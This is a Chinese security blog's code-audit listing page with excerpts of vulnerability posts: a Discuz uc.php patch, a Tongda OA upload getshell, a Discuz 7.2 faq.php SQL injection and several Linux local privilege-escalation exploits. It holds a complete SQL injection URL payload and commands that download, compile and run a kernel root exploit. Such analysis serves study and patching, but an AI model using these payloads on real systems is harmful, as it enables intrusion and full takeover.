代码审计

[置顶] Aiiphp框架测试版发布,欢迎测试!

[置顶] Linux常用运维命令和linux常用管理操作命令(整理)

[置顶] Linux/Window服务器安全配置等常用软件下载列表

Discuz中 uc.php文件 uc-key执行漏洞修复方法

Discuz中 uc.php文件 uc-key执行漏洞修复方法

DZ uc.php文件 uc-key漏洞修复方法

主要修复方法参照:

dz3.2 最新版本:

文件:

api/uc.php

1、约241行:


function updatebadwords($get, $post) {
global $_G;

if(!API_UPDATEBADWORDS) {
return API_RETURN_FORBIDDEN;
}

$data = array();
if(is_array($post)) {
foreach($post as $k => $v) {
//dz官网修复方法 uc-key方法。 6.24
if(substr($v['findpattern'], 0, 1) != '/' || substr($v['findpattern'], -3) != '/is') {
$v['findpattern'] = '/' . preg_quote($v['findpattern'], '/') . '/is';
}
//end
$data['findpattern'][$k] = $v['findpattern'];
$data['replace'][$k] = $v['replacement'];
}
}



» 阅读全文

关键词: 漏洞修复 , uc-key漏洞

通达OA系统傻逼上传漏洞分析,可以直接getshell附EXP

通达oa是一个不错的OA系统,但是这个不错的OA系统,却有一个傻逼上传漏洞,再加上apache的那个奇葩解析漏洞,我靠,简直天作之合啊。下面做一个分析,可以直接getshell附EXP

漏洞的具体版本不太清楚,各位就当是一个学习吧。

漏洞文件在:在general/vmeet/ 下的 privateUpload.php文件

» 阅读全文

关键词: 漏洞分析 , getshell , 通达oa

PHP程序漏洞审计:魔术引号带来的新的安全问题

在《高级PHP应用程序漏洞审核技术》[1]一文里的"魔术引号带来的新的安全问题"一节里,有

提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体

现,如下面的代码片段:

// foo.php?xigr='ryat

» 阅读全文

关键词: php漏洞 , 漏洞审计

最新discuz7.2 faq.php文高危SQL注入漏洞分析

discuz7.2又爆出最新高危SQ额L注入漏洞。网上已经爆出EXP,但是我们也应该了解下漏洞的原因嘛,所以就来分析:

网上公布的出POC了,POC如下:

    http://www.jincon.com /faq.php?action=grouppermission&gids[99]=’&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23

那么我把discuz7.2下载好,看到faq.php,找到action=grouppermission的代码(148行开始):

» 阅读全文

关键词: discuz7.2漏洞 , sql注入

Linux kernel <= v3.15-rc4 本地提权Exploit:cve-2014-0196-md.c 已测

这篇日志被加密了,请输入密码后查看。

Linux 2.6.39 到 3.2.0 内核爆本地提权漏洞exp代码

linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。

 

重现方法:

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

cc mempodipper.c

./a.out

 

在执行完毕后运行 whoami 来看是否执行成功。

» 阅读全文

关键词: 漏洞exp , 本地提权 , linux

Ubuntu 12.10 64-Bit sock_diag_handlers本地提权Exploit

ubuntu 12.10 64-Bit sock_diag_handlers本地提权exploit。代码具有攻击性,请用于测试和研究,否则后果自负

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>

» 阅读全文

关键词: exploit , 本地提权 , ubuntu

full-nelson.c代码:Ubuntu(Linux Kernel <= 2.6.37) Econet 协议的本地提权exp代码

程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell

update 过的 Ubuntu 10.04 Server LTS 上测试通过:

uname -r
2.6.32-21-server

测试:

2.6.35-22-generic也通过。

代码具有攻击性,攻击他人网站自重。

» 阅读全文

关键词: 本地提权 , full-nelson.c , exp代码

Total: 1112Next ›